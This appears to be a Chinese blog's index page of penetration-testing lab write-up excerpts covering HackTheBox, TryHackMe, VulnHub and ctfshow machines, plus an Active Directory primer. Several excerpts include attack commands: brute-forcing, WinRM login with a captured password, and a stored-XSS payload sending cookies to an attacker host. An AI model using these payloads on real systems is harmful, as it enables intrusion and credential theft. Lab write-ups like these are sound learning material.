HTB-Return Return信息收集 访问80端口 是一个打印机。 这个地方可以利用ldap回传攻击 将ip改成自己的vpn的ip 然后端口不变,进行一个监听 得到密码 1edFg43012!! 漏洞利用上面的5985端口开启 可以试试winrm登录 1evil-winrm -i 10.10.11.108 -u "svc-printer" -p '1edFg43012!! 2025-02-11 Windows靶机初级 #HTB
HTB-Heal HTB-Heal信息收集扫描端口信息 22和80端口开放。 将域名和对应ip添加到/etc/hosts中 扫下后台 123/index.html/robots.txt/manifest.json 没什么有用的信息。 进行子域名爆破,看是否存在子域名。 1ffuf -w subdomains-top1million-110000.txt -u http://heal.htb/ -H &quo 2025-02-07 Linux靶机中级 #HTB
HTB-Backfire HTB-Backfire信息收集8000 22 443端口开启。 访问8000端口 发现有两个文件 漏洞利用下载下来看看 发现是一个Havoc 经过搜索得到一个SSRF的漏洞 参考链接:https://github.com/HimmeL-Byte/CVE-2024-41570-SSRF-RCE 尝试着打一下 发现可以 登录进去之后发现shell并不长久 我们可以通过ssh的公私钥对 进行一个 2025-02-02 Linux靶机中级 #HTB
HTB-cat HTB-cat信息收集 22 80端口开放 然后将cat.htb添加到/etc/hosts中 扫描后台 发现git泄露 将git泄露的代码拉下来审计 发现一个xss的 username和email未经过验证就被写进数据库中,这里能写入存储型的xss 获取cookie: 1<script>document.location='http://10.10.14.68:8888 2025-02-02 Linux靶机中级 #HTB
HTB-Trickster HTB-Tricksterlinux 中等难度 信息收集端口扫描发现22和80端口开放 访问80端口 发现并不能访问它的服务 做一下映射 将域名添加到/etc/hosts中。 第一个网站扫后台扫到了一个assets 没找到什么有用的信息 第二个网站是一个PrestaSHop 网上搜了大部分是sql注入漏洞 注册一个账户登录进去看看。 没啥东西,扫后台可以知道是一个git泄露 利用GitH 2025-01-25 Linux靶机中级 #HTB
HTB-Cicada HTB-Cicada信息收集 端口开放 445 利用smbclient查看一下共享资源。 在HR下 找到一个txt文件 下载下来。 漏洞利用在txt里面得到一个账户默认的密码,但是用户名并不知道,需要枚举。 1crackmapexec smb 10.10.11.35 -u "guest" -p " " --rid-brute | grep " 2025-01-17 Windows靶机初级 #HTB
ctfshow渗透赛复现 ctfshow渗透赛复现前置:我那时候只做到了第二章,第三章往后的都没做出来,主要是复现3到5章的内容,前两章的大概思路就是通过爆破,可以得到压缩包的密码,然后解一下RSA可以得到网址,账号密码的话,xxx.gxv 那个网站存在一个任意文件下载,通过wpscan api扫出来的 可以下载config.php得到初始的账号密码,然后登录进去,对jwt进行一个爆破,得到密钥,伪造身份,然后就是扫靶机的 2025-01-10 渗透比赛 #比赛复现
Empire_LupinOne Empire: LupinOne信息收集首先扫描存活主机。 得到ip地址为192.168.29.170 然后扫描端口信息,进行服务的访问。 80和22端口开放,没啥特别的漏洞,那就去扫一下后台看是否存在敏感文件。 访问/manual 会跳转到一个Apache HTTP Server Version 2.4 服务的界面。 没找到什么可以利用的漏洞,然后去访问robots.txt 可以看到有一 2025-01-02 靶机 #vulnhub
域渗透基础知识 Active Directory 基础知识Windows域当一个区域有多台计算机,难以逐个管理时,通常会将这些计算机的通用组件的管理集中在一个被称为Active Directory(AD)的存储库中,运行AD的服务器被称为DC(域控制器) 管理员通过控制AD从而控制其他计算机,并在AD中配置策略应用到网络中。 ADAD中包含很多对象,包括用户,机器,安全组,打印机等。 域中比较重要的安全组: 2024-12-03 Offensive Pentesting #tryhackme
Internal Internal信息收集:nmap扫一波 22和80端口开放 扫下后台 有一个phpadmin和wordpress的后台登录 使用wpscn扫一下看看情况 1wpscan --url "http://10.10.50.8/blog" -eu 利用wpscan爆破密码 1wpscan --url "http://10.10.50.8/blog" -U 2024-11-28 Offensive Pentesting #tryhackme